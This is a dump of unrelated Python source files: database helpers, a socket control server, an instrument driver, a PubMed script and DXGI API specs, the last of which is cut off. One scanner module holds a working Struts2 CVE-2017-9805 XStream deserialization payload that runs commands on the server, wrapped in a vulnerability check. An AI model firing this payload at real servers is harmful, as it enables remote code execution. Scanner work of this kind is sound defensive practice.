strategies, balances\n'), ((261, 16, 262, 64), 'portfolio.db.fdbhandler.results.update_result', 'results.update_result', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((266, 35, 267, 38), 'portfolio.db.fdbhandler.results.get_result_account_by_id', 'results.get_result_account_by_id', ({(267, 20, 267, 37): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((268, 36, 269, 38), 'portfolio.db.fdbhandler.results.get_result_strategy_by_id', 'results.get_result_strategy_by_id', ({(269, 20, 269, 37): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((271, 16, 272, 60), 'portfolio.db.fdbhandler.balances.update_balances_with_new_result', 'balances.update_balances_with_new_result', ({(272, 20, 272, 36): 'account_involved', (272, 38, 272, 59): 'diff_betweeen_results'}, {}), '(account_involved,\n diff_betweeen_results)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((273, 16, 274, 61), 
'portfolio.db.fdbhandler.strategies.update_strategies_with_new_result', 'strategies.update_strategies_with_new_result', ({(274, 20, 274, 37): 'strategy_involved', (274, 39, 274, 60): 'diff_betweeen_results'}, {}), '(strategy_involved,\n diff_betweeen_results)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((293, 12, 294, 65), 'portfolio.db.fdbhandler.results.update_result', 'results.update_result', (), '', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n'), ((277, 29, 277, 42), 'PyQt5.QtWidgets.QMessageBox', 'QMessageBox', ({}, {}), '()', False, 'from PyQt5.QtWidgets import QTableWidgetItem, QTableWidget, QAbstractItemView, QMenu, QMessageBox\n'), ((284, 34, 285, 38), 'portfolio.db.fdbhandler.results.get_result_amount_by_id', 'results.get_result_amount_by_id', ({(285, 20, 285, 37): 'database_entry_id'}, {}), '(database_entry_id)', False, 'from portfolio.db.fdbhandler import results, strategies, balances\n')] |
d4yvie/advent_of_code_2021 | Day5/overlap_result.py | bb74b9dc7b23c5ba338dcd8d2e698c7ea4e34c59 | class OverlapResult:
def __init__(self, overlap_map: dict[tuple[float, float], int]):
self._overlap_map = overlap_map
self._overlaps = overlap_map_to_overlaps(overlap_map)
@property
def overlaps(self) -> int:
return self._overlaps
@property
def overlap_map(self) -> dict[tuple[float, float], int]:
return self._overlap_map
def overlap_map_to_overlaps(overlap_map: dict[tuple[float, float], int], minimal_overlap=2) -> int:
return len(list(filter(lambda val: val >= minimal_overlap, overlap_map.values())))
| [] |
NikolaiT/proxychecker | setup.py | cd6a024668826c415f91e909c98e4110ffc8c10d | #!/usr/bin/env python
from distutils.core import setup
VERSION = "0.0.1"
setup(
author='Nikolai Tschacher',
name = "proxychecker",
version = VERSION,
description = "A Python proxychecker module that makes use of socks",
url = "http://incolumitas.com",
license = "BSD",
author_email = "[email protected]",
keywords = ["socks", "proxy", "proxychecker"],
py_modules = ['proxychecker', 'sockshandler', 'socks']
)
| [((6, 0, 16, 1), 'distutils.core.setup', 'setup', (), '', False, 'from distutils.core import setup\n')] |
puiterwijk/charlotte | charlotte/charlotte.py | 42aa2a126f473fa4ddedb61eb5dc021d8d609fbe | class Config:
def __init__(self, config_file_name):
self.config_file_name = config_file_name
| [] |
taomujian/linbing | python/app/plugins/http/Struts2/S2_052.py | fe772a58f41e3b046b51a866bdb7e4655abaf51a | #!/usr/bin/env python3
from app.lib.utils.request import request
from app.lib.utils.encode import base64encode
from app.lib.utils.common import get_capta, get_useragent
class S2_052_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'S2-052漏洞,又名CVE-2017-9805漏洞',
'description': 'Struts2 Remote Code Execution Vulnerability, Struts 2.1.6 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12',
'date': '2017-09-05',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.capta = get_capta()
self.headers = {
'User-Agent': get_useragent(),
'Content-Type': "application/xml",
}
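        # The XML below is the publicly documented S2-052 / CVE-2017-9805 gadget
        # chain: the Struts 2 REST plugin deserializes the XML request body with
        # XStream, and {cmd} is substituted with the command to execute.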
self.payload ='''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{cmd}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
def check(self):
"""
        Check whether the target is vulnerable
        :param:
        :return bool True or False: whether the vulnerability exists
"""
try:
self.check_payload = self.payload.format(cmd = '<string>calc</string>')
check_req = request.post(self.url, headers = self.headers, data = self.check_payload)
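            # A vulnerable endpoint responds with HTTP 500 and a deserialization
            # stack trace containing java.security.Provider$Service, which is used
            # below as the detection signature.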
if check_req.status_code == 500 and 'java.security.Provider$Service' in check_req.text:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == "__main__":
S2_052 = S2_052_BaseVerify('http://127.0.0.1:8088/struts2_rest_showcase_war_exploded/orders/3') | [((19, 21, 19, 32), 'app.lib.utils.common.get_capta', 'get_capta', ({}, {}), '()', False, 'from app.lib.utils.common import get_capta, get_useragent\n'), ((22, 26, 22, 41), 'app.lib.utils.common.get_useragent', 'get_useragent', ({}, {}), '()', False, 'from app.lib.utils.common import get_capta, get_useragent\n'), ((94, 24, 94, 97), 'app.lib.utils.request.request.post', 'request.post', (), '', False, 'from app.lib.utils.request import request\n')] |
RIDCorix/UPD | UPD/extension/utils.py | 8694d119181a4afffafbfbab510f697399c1ea13 | import sys
# def get_tools():
# manager = PluginManager()
# manager.setPluginPlaces(["plugins/file_cabinet"])
# manager.collectPlugins()
# return [plugin.plugin_object for plugin in manager.getAllPlugins()]
def get_tools():
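    """Import each tool package's ``tool`` object and best-effort import its auto-load submodules."""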
import importlib
tools = ['file_cabinet', 'us', 'automator', 'main']
tool_installation_dir1 = 'C:/Users/User/UPD/plugins'
tool_installation_dir2 = '/Users/mac/UPD/plugins'
sys.path.append(tool_installation_dir1)
sys.path.append(tool_installation_dir2)
tool_instances = []
auto_load_modules = ['tasks', 'ui', 'models', 'renderers']
for tool in tools:
tool_instances.append(importlib.import_module('.'.join([tool, 'tool'])).tool)
for module in auto_load_modules:
try:
importlib.import_module('.'.join([tool, module]))
            except Exception:
                # a tool is not required to provide every auto-load submodule
                pass
return tool_instances
| [((14, 4, 14, 43), 'sys.path.append', 'sys.path.append', ({(14, 20, 14, 42): 'tool_installation_dir1'}, {}), '(tool_installation_dir1)', False, 'import sys\n'), ((15, 4, 15, 43), 'sys.path.append', 'sys.path.append', ({(15, 20, 15, 42): 'tool_installation_dir2'}, {}), '(tool_installation_dir2)', False, 'import sys\n')] |
cariaso/metapub | sbin/preload_findit_coverage_2.py | bfa361dd6e5de8ee0859e596d490fb478f7dcfba | from __future__ import absolute_import, print_function, unicode_literals
# "preload" for FindIt #2: iterate over same journal list, but actually
# load a PubMedArticle object on each PMID. (no list output created)
from metapub import FindIt, PubMedFetcher
from metapub.findit.dances import the_doi_2step
from config import JOURNAL_ISOABBR_LIST_FILENAME
fetch = PubMedFetcher()
def get_sample_pmids_for_journal(jrnl, years=None, max_pmids=3):
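    """Return sample PMIDs for *jrnl*: one per year in *years*, or the first *max_pmids* matches."""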
samples = []
if years is None:
pmids = fetch.pmids_for_query(journal=jrnl)
idx = 0
while idx < len(pmids) and idx < max_pmids:
samples.append(pmids[idx])
idx += 1
else:
for year in years:
pmids = fetch.pmids_for_query(journal=jrnl, year=year)
if len(pmids) < 1:
continue
samples.append(pmids[0])
return samples
def main():
jrnls = sorted(open(JOURNAL_ISOABBR_LIST_FILENAME).read().split('\n'))
for jrnl in jrnls:
jrnl = jrnl.strip()
if jrnl == '':
continue
years = ['1975', '1980', '1990', '2002', '2013']
num_desired = len(years)
pmids = get_sample_pmids_for_journal(jrnl, years=years)
if len(pmids) < num_desired:
pmids = pmids + get_sample_pmids_for_journal(jrnl, max_pmids=num_desired-len(pmids))
print('[%s] Sample pmids: %r' % (jrnl, pmids))
for pmid in pmids:
pma = fetch.article_by_pmid(pmid)
print(' ', pma.pmid, pma.title)
if __name__ == '__main__':
main()
| [((12, 8, 12, 23), 'metapub.PubMedFetcher', 'PubMedFetcher', ({}, {}), '()', False, 'from metapub import FindIt, PubMedFetcher\n')] |
vfxetc/sgcache | sgcache/control.py | 670bfac2904373e19c2dac7504d2d7f87018833d | from __future__ import absolute_import
from select import select
import errno
import functools
import itertools
import json
import logging
import os
import socket
import threading
import time
import traceback
log = logging.getLogger(__name__)
from .utils import makedirs, unlink
class TimeOut(Exception):
pass
base_handlers = {
'ping': lambda control, msg: {'type': 'pong', 'pid': os.getpid()}
}
def _coerce_msg(type=None, **msg):
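    """Normalize either _coerce_msg('type', key=val) or _coerce_msg({...}) into a single message dict."""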
if type:
if isinstance(type, basestring):
msg['type'] = type
return msg
elif msg:
raise ValueError('cannot specify dict message and kwargs')
else:
msg = dict(type)
if 'type' not in msg:
raise ValueError('message requires type')
return msg
class ControlClient(object):
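    """One end of a control channel: newline-delimited JSON messages over a UNIX
    or TCP socket; a message's optional ``wait`` id is used to correlate replies."""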
handlers = base_handlers.copy()
def __init__(self, addr=None, sock=None, server=None):
self.addr = addr
self.sock = sock
self.server = server
self._line_buffer = ''
self._message_buffer = []
self._handler_reply_ids = None
self._session_generator = itertools.count(1)
if sock is None:
self.connect()
def connect(self):
# This is indempodent.
if self.sock is not None:
return
if self.addr is None:
return
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.connect(self.addr)
return True
def close(self):
if self.sock:
self.sock.close()
self.sock = None
def _readline(self, timeout=None):
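        """Read one newline-terminated message from the socket, buffering any partial data."""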
if not self.sock:
return
if timeout:
end_time = time.time() + timeout
buffer_ = self._line_buffer
while True:
r, _, _ = select([self.sock], [], [], max(0, end_time - time.time()) if timeout else None)
if not r:
raise TimeOut()
new = self.sock.recv(4096)
if not new:
self.sock = None
self._line_buffer = ''
return
buffer_ += new
if '\n' in buffer_:
line, buffer_ = buffer_.split('\n', 1)
self._line_buffer = buffer_
return line
def recv(self, timeout=None):
try:
return self._message_buffer.pop(0)
except IndexError:
pass
for attempt_num in (0, 1):
self.connect()
try:
line = self._readline(timeout)
            except socket.error as e:
                if attempt_num:
                    raise
                # drop the dead socket so the retry actually reconnects; `line` is unbound here
                self.close()
                continue
if line:
try:
return json.loads(line)
except:
self.send('error', message='malformed message')
self.close()
return
if attempt_num:
return
def recv_for(self, wait_id, timeout=None):
for i in xrange(len(self._message_buffer)):
msg = self._message_buffer[i]
if msg.get('for') == wait_id:
self._message_buffer.pop(i)
return msg
while True:
msg = self.recv(timeout)
if not msg:
return
if msg.get('for') == wait_id:
return msg
self._message_buffer.append(msg)
def send(self, *args, **kwargs):
msg = _coerce_msg(*args, **kwargs)
wait_id = msg.get('wait')
if wait_id is True:
wait_id = msg['wait'] = next(self._session_generator)
encoded = json.dumps(msg)
# Track what has been sent automatically.
if wait_id is not None and self._handler_reply_ids is not None:
self._handler_reply_ids.add(wait_id)
# Attempt to reconnect a couple times when sending this.
for attempt_num in (0, 1):
self.connect()
            try:
                self.sock.send(encoded + '\n')
                break  # sent once; looping again would send the message twice
            except socket.error as e:
                if attempt_num:
                    raise
                self.close()  # force connect() to open a fresh socket on the retry
return wait_id
def reply_to(self, original, *args, **kwargs):
wait_id = original.get('wait')
if wait_id is None:
raise ValueError('original message has no session')
msg = _coerce_msg(*args, **kwargs)
msg['for'] = wait_id
self.send(msg)
def send_and_recv(self, type, **kwargs):
timeout = kwargs.pop('timeout')
msg = _coerce_msg(type, **kwargs)
msg['wait'] = True
wait_id = self.send(msg)
return self.recv_for(wait_id, timeout)
def ping(self, timeout=None):
return self.send_and_recv('ping', pid=os.getpid(), timeout=timeout)
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
msg = self.recv()
if not msg:
return
type_ = msg.get('type')
wait_id = msg.get('wait')
func = self.handlers.get(type_)
if func is None and self.server:
func = self.server.handlers.get(type_)
if func is None:
log.warning('unknown message type %r' % type_)
self.reply_to(msg, 'error', message='unknown message type %r' % type_)
continue
if self.server and self.server.name:
log.info('%s handling %s' % (self.server.name, type_))
else:
log.info('handling %s' % type_)
self._handler_reply_ids = set()
try:
res = func(self, msg)
except Exception as e:
self.reply_to(msg, 'error', message='unhandled exception %s' % e)
continue
# If the handler replied, then we are done.
if res is None and wait_id is None or wait_id in self._handler_reply_ids:
continue
res = res.copy() if isinstance(res, dict) and 'type' in res else {'type': 'result', 'value': res}
if wait_id is not None:
res['for'] = wait_id
self.send(res)
class ControlServer(object):
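    """Accept connections on a UNIX or TCP socket and run a ControlClient message
    loop for each one.

    Rough usage sketch (socket path and handler are hypothetical)::

        server = ControlServer('/tmp/control.sock', name='example')
        server.register(lambda client, msg: {'ok': True}, name='status')
        server.loop()
    """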
def __init__(self, addr, name=None):
self.addr = addr
self.name = name
self.handlers = base_handlers.copy()
if isinstance(self.addr, basestring):
self.sock = socket.socket(socket.AF_UNIX)
if os.path.exists(self.addr):
# TODO: Try connecting to it before destroying it.
unlink(self.addr)
makedirs(os.path.dirname(self.addr))
else:
self.sock = socket.socket(socket.AF_INET)
self.sock.bind(self.addr)
self.sock.listen(5)
def register(self, func=None, **kwargs):
if func is None:
            # decorator form: register(name=...) returns a partial awaiting the function
            return functools.partial(self.register, **kwargs)
self.handlers[kwargs.get('name') or func.__name__] = func
def loop(self, async=False):
if async:
thread = threading.Thread(target=self.loop)
thread.daemon = True
thread.start()
return thread
while True:
try:
client_sock, addr = self.sock.accept()
except socket.timeout:
continue
client = ControlClient(sock=client_sock, server=self)
client.loop(async=True)
| [] |
mtsolmn/lantz-drivers | lantz/drivers/tektronix/tds1002b.py | f48caf9000ddd08f2abb837d832e341410af4788 | # -*- coding: utf-8 -*-
"""
    lantz.drivers.tektronix.tds1002b
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Implements the drivers to control an oscilloscope.
:copyright: 2015 by Lantz Authors, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from lantz.core import Feat, MessageBasedDriver
class TDS1002b(MessageBasedDriver):
MANUFACTURER_ID = '0x699'
MODEL_CODE = '0x363'
@Feat(read_once=True)
def idn(self):
return self.query('*IDN?')
| [((19, 5, 19, 25), 'lantz.core.Feat', 'Feat', (), '', False, 'from lantz.core import Feat, MessageBasedDriver\n')] |
linkmauve/apitrace | specs/dxgi.py | a22dda1ac2f27cd014ac7a16e7b7b6ebc9f14ae1 | ##########################################################################
#
# Copyright 2014 VMware, Inc
# Copyright 2011 Jose Fonseca
# All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
##########################################################################/
from .winapi import *
DXGI_FORMAT = Enum("DXGI_FORMAT", [
"DXGI_FORMAT_UNKNOWN",
"DXGI_FORMAT_R32G32B32A32_TYPELESS",
"DXGI_FORMAT_R32G32B32A32_FLOAT",
"DXGI_FORMAT_R32G32B32A32_UINT",
"DXGI_FORMAT_R32G32B32A32_SINT",
"DXGI_FORMAT_R32G32B32_TYPELESS",
"DXGI_FORMAT_R32G32B32_FLOAT",
"DXGI_FORMAT_R32G32B32_UINT",
"DXGI_FORMAT_R32G32B32_SINT",
"DXGI_FORMAT_R16G16B16A16_TYPELESS",
"DXGI_FORMAT_R16G16B16A16_FLOAT",
"DXGI_FORMAT_R16G16B16A16_UNORM",
"DXGI_FORMAT_R16G16B16A16_UINT",
"DXGI_FORMAT_R16G16B16A16_SNORM",
"DXGI_FORMAT_R16G16B16A16_SINT",
"DXGI_FORMAT_R32G32_TYPELESS",
"DXGI_FORMAT_R32G32_FLOAT",
"DXGI_FORMAT_R32G32_UINT",
"DXGI_FORMAT_R32G32_SINT",
"DXGI_FORMAT_R32G8X24_TYPELESS",
"DXGI_FORMAT_D32_FLOAT_S8X24_UINT",
"DXGI_FORMAT_R32_FLOAT_X8X24_TYPELESS",
"DXGI_FORMAT_X32_TYPELESS_G8X24_UINT",
"DXGI_FORMAT_R10G10B10A2_TYPELESS",
"DXGI_FORMAT_R10G10B10A2_UNORM",
"DXGI_FORMAT_R10G10B10A2_UINT",
"DXGI_FORMAT_R11G11B10_FLOAT",
"DXGI_FORMAT_R8G8B8A8_TYPELESS",
"DXGI_FORMAT_R8G8B8A8_UNORM",
"DXGI_FORMAT_R8G8B8A8_UNORM_SRGB",
"DXGI_FORMAT_R8G8B8A8_UINT",
"DXGI_FORMAT_R8G8B8A8_SNORM",
"DXGI_FORMAT_R8G8B8A8_SINT",
"DXGI_FORMAT_R16G16_TYPELESS",
"DXGI_FORMAT_R16G16_FLOAT",
"DXGI_FORMAT_R16G16_UNORM",
"DXGI_FORMAT_R16G16_UINT",
"DXGI_FORMAT_R16G16_SNORM",
"DXGI_FORMAT_R16G16_SINT",
"DXGI_FORMAT_R32_TYPELESS",
"DXGI_FORMAT_D32_FLOAT",
"DXGI_FORMAT_R32_FLOAT",
"DXGI_FORMAT_R32_UINT",
"DXGI_FORMAT_R32_SINT",
"DXGI_FORMAT_R24G8_TYPELESS",
"DXGI_FORMAT_D24_UNORM_S8_UINT",
"DXGI_FORMAT_R24_UNORM_X8_TYPELESS",
"DXGI_FORMAT_X24_TYPELESS_G8_UINT",
"DXGI_FORMAT_R8G8_TYPELESS",
"DXGI_FORMAT_R8G8_UNORM",
"DXGI_FORMAT_R8G8_UINT",
"DXGI_FORMAT_R8G8_SNORM",
"DXGI_FORMAT_R8G8_SINT",
"DXGI_FORMAT_R16_TYPELESS",
"DXGI_FORMAT_R16_FLOAT",
"DXGI_FORMAT_D16_UNORM",
"DXGI_FORMAT_R16_UNORM",
"DXGI_FORMAT_R16_UINT",
"DXGI_FORMAT_R16_SNORM",
"DXGI_FORMAT_R16_SINT",
"DXGI_FORMAT_R8_TYPELESS",
"DXGI_FORMAT_R8_UNORM",
"DXGI_FORMAT_R8_UINT",
"DXGI_FORMAT_R8_SNORM",
"DXGI_FORMAT_R8_SINT",
"DXGI_FORMAT_A8_UNORM",
"DXGI_FORMAT_R1_UNORM",
"DXGI_FORMAT_R9G9B9E5_SHAREDEXP",
"DXGI_FORMAT_R8G8_B8G8_UNORM",
"DXGI_FORMAT_G8R8_G8B8_UNORM",
"DXGI_FORMAT_BC1_TYPELESS",
"DXGI_FORMAT_BC1_UNORM",
"DXGI_FORMAT_BC1_UNORM_SRGB",
"DXGI_FORMAT_BC2_TYPELESS",
"DXGI_FORMAT_BC2_UNORM",
"DXGI_FORMAT_BC2_UNORM_SRGB",
"DXGI_FORMAT_BC3_TYPELESS",
"DXGI_FORMAT_BC3_UNORM",
"DXGI_FORMAT_BC3_UNORM_SRGB",
"DXGI_FORMAT_BC4_TYPELESS",
"DXGI_FORMAT_BC4_UNORM",
"DXGI_FORMAT_BC4_SNORM",
"DXGI_FORMAT_BC5_TYPELESS",
"DXGI_FORMAT_BC5_UNORM",
"DXGI_FORMAT_BC5_SNORM",
"DXGI_FORMAT_B5G6R5_UNORM",
"DXGI_FORMAT_B5G5R5A1_UNORM",
"DXGI_FORMAT_B8G8R8A8_UNORM",
"DXGI_FORMAT_B8G8R8X8_UNORM",
"DXGI_FORMAT_R10G10B10_XR_BIAS_A2_UNORM",
"DXGI_FORMAT_B8G8R8A8_TYPELESS",
"DXGI_FORMAT_B8G8R8A8_UNORM_SRGB",
"DXGI_FORMAT_B8G8R8X8_TYPELESS",
"DXGI_FORMAT_B8G8R8X8_UNORM_SRGB",
"DXGI_FORMAT_BC6H_TYPELESS",
"DXGI_FORMAT_BC6H_UF16",
"DXGI_FORMAT_BC6H_SF16",
"DXGI_FORMAT_BC7_TYPELESS",
"DXGI_FORMAT_BC7_UNORM",
"DXGI_FORMAT_BC7_UNORM_SRGB",
"DXGI_FORMAT_AYUV",
"DXGI_FORMAT_Y410",
"DXGI_FORMAT_Y416",
"DXGI_FORMAT_NV12",
"DXGI_FORMAT_P010",
"DXGI_FORMAT_P016",
"DXGI_FORMAT_420_OPAQUE",
"DXGI_FORMAT_YUY2",
"DXGI_FORMAT_Y210",
"DXGI_FORMAT_Y216",
"DXGI_FORMAT_NV11",
"DXGI_FORMAT_AI44",
"DXGI_FORMAT_IA44",
"DXGI_FORMAT_P8",
"DXGI_FORMAT_A8P8",
"DXGI_FORMAT_B4G4R4A4_UNORM",
])
HRESULT = MAKE_HRESULT([
"DXGI_STATUS_OCCLUDED",
"DXGI_STATUS_CLIPPED",
"DXGI_STATUS_NO_REDIRECTION",
"DXGI_STATUS_NO_DESKTOP_ACCESS",
"DXGI_STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_STATUS_MODE_CHANGED",
"DXGI_STATUS_MODE_CHANGE_IN_PROGRESS",
"DXGI_ERROR_INVALID_CALL",
"DXGI_ERROR_NOT_FOUND",
"DXGI_ERROR_MORE_DATA",
"DXGI_ERROR_UNSUPPORTED",
"DXGI_ERROR_DEVICE_REMOVED",
"DXGI_ERROR_DEVICE_HUNG",
"DXGI_ERROR_DEVICE_RESET",
"DXGI_ERROR_WAS_STILL_DRAWING",
"DXGI_ERROR_FRAME_STATISTICS_DISJOINT",
"DXGI_ERROR_GRAPHICS_VIDPN_SOURCE_IN_USE",
"DXGI_ERROR_DRIVER_INTERNAL_ERROR",
"DXGI_ERROR_NONEXCLUSIVE",
"DXGI_ERROR_NOT_CURRENTLY_AVAILABLE",
"DXGI_ERROR_REMOTE_CLIENT_DISCONNECTED",
"DXGI_ERROR_REMOTE_OUTOFMEMORY",
# IDXGIKeyedMutex::AcquireSync
"WAIT_ABANDONED",
"WAIT_TIMEOUT",
])
DXGI_RGB = Struct("DXGI_RGB", [
(Float, "Red"),
(Float, "Green"),
(Float, "Blue"),
])
DXGI_GAMMA_CONTROL = Struct("DXGI_GAMMA_CONTROL", [
(DXGI_RGB, "Scale"),
(DXGI_RGB, "Offset"),
(Array(DXGI_RGB, 1025), "GammaCurve"),
])
DXGI_GAMMA_CONTROL_CAPABILITIES = Struct("DXGI_GAMMA_CONTROL_CAPABILITIES", [
(BOOL, "ScaleAndOffsetSupported"),
(Float, "MaxConvertedValue"),
(Float, "MinConvertedValue"),
(UINT, "NumGammaControlPoints"),
(Array(Float, "{self}.NumGammaControlPoints"), "ControlPointPositions"),
])
DXGI_RATIONAL = Struct("DXGI_RATIONAL", [
(UINT, "Numerator"),
(UINT, "Denominator"),
])
DXGI_MODE_SCANLINE_ORDER = Enum("DXGI_MODE_SCANLINE_ORDER", [
"DXGI_MODE_SCANLINE_ORDER_UNSPECIFIED",
"DXGI_MODE_SCANLINE_ORDER_PROGRESSIVE",
"DXGI_MODE_SCANLINE_ORDER_UPPER_FIELD_FIRST",
"DXGI_MODE_SCANLINE_ORDER_LOWER_FIELD_FIRST",
])
DXGI_MODE_SCALING = Enum("DXGI_MODE_SCALING", [
"DXGI_MODE_SCALING_UNSPECIFIED",
"DXGI_MODE_SCALING_CENTERED",
"DXGI_MODE_SCALING_STRETCHED",
])
DXGI_MODE_ROTATION = Enum("DXGI_MODE_ROTATION", [
"DXGI_MODE_ROTATION_UNSPECIFIED",
"DXGI_MODE_ROTATION_IDENTITY",
"DXGI_MODE_ROTATION_ROTATE90",
"DXGI_MODE_ROTATION_ROTATE180",
"DXGI_MODE_ROTATION_ROTATE270",
])
DXGI_MODE_DESC = Struct("DXGI_MODE_DESC", [
(UINT, "Width"),
(UINT, "Height"),
(DXGI_RATIONAL, "RefreshRate"),
(DXGI_FORMAT, "Format"),
(DXGI_MODE_SCANLINE_ORDER, "ScanlineOrdering"),
(DXGI_MODE_SCALING, "Scaling"),
])
DXGI_QUALITY_LEVEL = FakeEnum(UINT, [
"DXGI_STANDARD_MULTISAMPLE_QUALITY_PATTERN",
"DXGI_CENTER_MULTISAMPLE_QUALITY_PATTERN",
])
DXGI_SAMPLE_DESC = Struct("DXGI_SAMPLE_DESC", [
(UINT, "Count"),
(DXGI_QUALITY_LEVEL, "Quality"),
])
DXGI_RGBA = Struct("DXGI_RGBA", [
(Float, "r"),
(Float, "g"),
(Float, "b"),
(Float, "a"),
])
IDXGIObject = Interface("IDXGIObject", IUnknown)
IDXGIDeviceSubObject = Interface("IDXGIDeviceSubObject", IDXGIObject)
IDXGIResource = Interface("IDXGIResource", IDXGIDeviceSubObject)
IDXGIKeyedMutex = Interface("IDXGIKeyedMutex", IDXGIDeviceSubObject)
IDXGISurface = Interface("IDXGISurface", IDXGIDeviceSubObject)
IDXGISurface1 = Interface("IDXGISurface1", IDXGISurface)
IDXGIAdapter = Interface("IDXGIAdapter", IDXGIObject)
IDXGIOutput = Interface("IDXGIOutput", IDXGIObject)
IDXGISwapChain = Interface("IDXGISwapChain", IDXGIDeviceSubObject)
IDXGIFactory = Interface("IDXGIFactory", IDXGIObject)
IDXGIDevice = Interface("IDXGIDevice", IDXGIObject)
IDXGIFactory1 = Interface("IDXGIFactory1", IDXGIFactory)
IDXGIAdapter1 = Interface("IDXGIAdapter1", IDXGIAdapter)
IDXGIDevice1 = Interface("IDXGIDevice1", IDXGIDevice)
DXGI_USAGE = Flags(UINT, [
"DXGI_CPU_ACCESS_NONE", # 0
"DXGI_CPU_ACCESS_SCRATCH", # 3
"DXGI_CPU_ACCESS_DYNAMIC", # 1
"DXGI_CPU_ACCESS_READ_WRITE", # 2
"DXGI_USAGE_SHADER_INPUT",
"DXGI_USAGE_RENDER_TARGET_OUTPUT",
"DXGI_USAGE_BACK_BUFFER",
"DXGI_USAGE_SHARED",
"DXGI_USAGE_READ_ONLY",
"DXGI_USAGE_DISCARD_ON_PRESENT",
"DXGI_USAGE_UNORDERED_ACCESS",
])
DXGI_FRAME_STATISTICS = Struct("DXGI_FRAME_STATISTICS", [
(UINT, "PresentCount"),
(UINT, "PresentRefreshCount"),
(UINT, "SyncRefreshCount"),
(LARGE_INTEGER, "SyncQPCTime"),
(LARGE_INTEGER, "SyncGPUTime"),
])
DXGI_MAPPED_RECT = Struct("DXGI_MAPPED_RECT", [
(INT, "Pitch"),
(LinearPointer(BYTE, "_MappedSize"), "pBits"),
])
DXGI_ADAPTER_DESC = Struct("DXGI_ADAPTER_DESC", [
(WString, "Description"),
(UINT, "VendorId"),
(UINT, "DeviceId"),
(UINT, "SubSysId"),
(UINT, "Revision"),
(SIZE_T, "DedicatedVideoMemory"),
(SIZE_T, "DedicatedSystemMemory"),
(SIZE_T, "SharedSystemMemory"),
(LUID, "AdapterLuid"),
])
DXGI_OUTPUT_DESC = Struct("DXGI_OUTPUT_DESC", [
(WString, "DeviceName"),
(RECT, "DesktopCoordinates"),
(BOOL, "AttachedToDesktop"),
(DXGI_MODE_ROTATION, "Rotation"),
(HMONITOR, "Monitor"),
])
DXGI_SHARED_RESOURCE = Struct("DXGI_SHARED_RESOURCE", [
(HANDLE, "Handle"),
])
DXGI_RESOURCE_PRIORITY = FakeEnum(UINT, [
"DXGI_RESOURCE_PRIORITY_MINIMUM",
"DXGI_RESOURCE_PRIORITY_LOW",
"DXGI_RESOURCE_PRIORITY_NORMAL",
"DXGI_RESOURCE_PRIORITY_HIGH",
"DXGI_RESOURCE_PRIORITY_MAXIMUM",
])
DXGI_RESIDENCY = Enum("DXGI_RESIDENCY", [
"DXGI_RESIDENCY_FULLY_RESIDENT",
"DXGI_RESIDENCY_RESIDENT_IN_SHARED_MEMORY",
